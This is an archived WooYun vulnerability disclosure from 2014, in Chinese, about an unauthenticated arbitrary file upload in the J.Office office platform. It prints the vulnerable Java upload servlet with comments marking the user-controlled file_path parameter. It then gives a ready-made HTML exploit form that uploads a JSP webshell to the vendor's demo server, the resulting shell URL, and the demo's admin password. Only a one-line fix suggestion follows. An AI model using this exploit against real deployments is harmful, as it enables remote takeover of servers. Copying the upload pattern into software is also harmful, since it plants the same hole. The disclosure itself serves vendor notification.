乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2014-07-08: 细节已通知厂商并且等待厂商处理中 2014-07-12: 厂商已经确认,细节仅向厂商公开 2014-07-15: 细节向第三方安全合作伙伴开放 2014-09-05: 细节向核心白帽子及相关领域专家公开 2014-09-15: 细节向普通白帽子公开 2014-09-25: 细节向实习白帽子公开 2014-10-06: 细节向公众公开
无需登录 任意文件上传可getshell首页来一个
官网
http://www.jee-soft.cn/htsite/index.html
产品
J.Office 协同办公开发平台
产品介绍
http://www.jee-soft.cn/htsite/html/cpjfw/cpzx/2012/06/12/1339484245731.html
成功案例
存在任意文件上传 demo站也测试成功了J.Office在线试用地址:电信:http://office.jee-soft.cn:8080/index.jsp网通:http://oa.jee-soft.cn:8080/index.jsp账号:admin密码:1产品开源可下载分析
http://www.jee-soft.cn/htsite/page/platformProduct/getProductList.ht
找demo站进行测试吧地址
http://office.jee-soft.cn:8080/jasper-upload
主要处理代码如下
protected void doPost(HttpServletRequest req, HttpServletResponse resp) throws ServletException, IOException { req.setCharacterEncoding("UTF-8"); resp.setCharacterEncoding("UTF-8"); try { DiskFileItemFactory factory = new DiskFileItemFactory(); factory.setSizeThreshold(4096); factory.setRepository(new File(this.tempPath)); ServletFileUpload fu = new ServletFileUpload(factory); List fileItems = fu.parseRequest(req); for (FileItem fi : fileItems) { if ("file_cat".equals(fi.getFieldName())) { this.fileCat = fi.getString(); // } if ("file_path".equals(fi.getFieldName())) { this.filePath = fi.getString();//获取文本域的值 上传文件路径可以自己控制 } } Iterator i = fileItems.iterator(); while (i.hasNext()) { FileItem fi = (FileItem)i.next(); String fileContentType = fi.getContentType(); if (fileContentType == null) { continue; } if (fi.getContentType() == null) { continue; } String path = fi.getName(); int start = path.lastIndexOf("\\"); String fileName = path.substring(start + 1); String relativeFullPath = null; String generName = FileUtil.generateFilename(fileName); //随机生成文件名 没大碍 不是关键 int sindex = generName.lastIndexOf("/"); int eindex = generName.lastIndexOf("."); String generDir = generName.substring(sindex + 1, eindex); generName = generName.substring(0, sindex) + "/" + generDir + "/" + generName.substring(sindex + 1, generName.length()); if (!"".equals(this.filePath)) //这里关键 filepath可以控制 不要为空 relativeFullPath = this.filePath; //走这一步 就不用管随机生成的文件名是什么了 else { relativeFullPath = this.fileCat + "/" + generName; } int index = relativeFullPath.lastIndexOf("/"); File dirPath = new File(this.uploadPath + "/" + relativeFullPath.substring(0, index + 1)); if (!dirPath.exists()) { //目录不存在可创建 dirPath.mkdirs(); } File temFile = new File(this.uploadPath + "/" + relativeFullPath); //filepath可以控制 使得任意文件上传 fi.write(temFile); //写文件了 //后面的就不用看了 .........
很明显的任意文件上传
可利用代码
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" ><head> <title>upload</title></head><body><form method="post" action="http://office.jee-soft.cn:8080/jasper-upload" enctype="multipart/form-data" ><input type="file" name="file" /><input type="hidden" name="file_cat" value="a" /><input type="hidden" name="file_path" value="temp/2.jsp" /> <input type="submit" name="tijiao" value="confirm"/></form></body></html>
上传后文件路径是
http://office.jee-soft.cn:8080/attachFiles/temp/2.jsp
对filepath写死 防止用户设置 对文件名进行判断
危害等级:高
漏洞Rank:16
确认时间:2014-07-12 22:47
暂无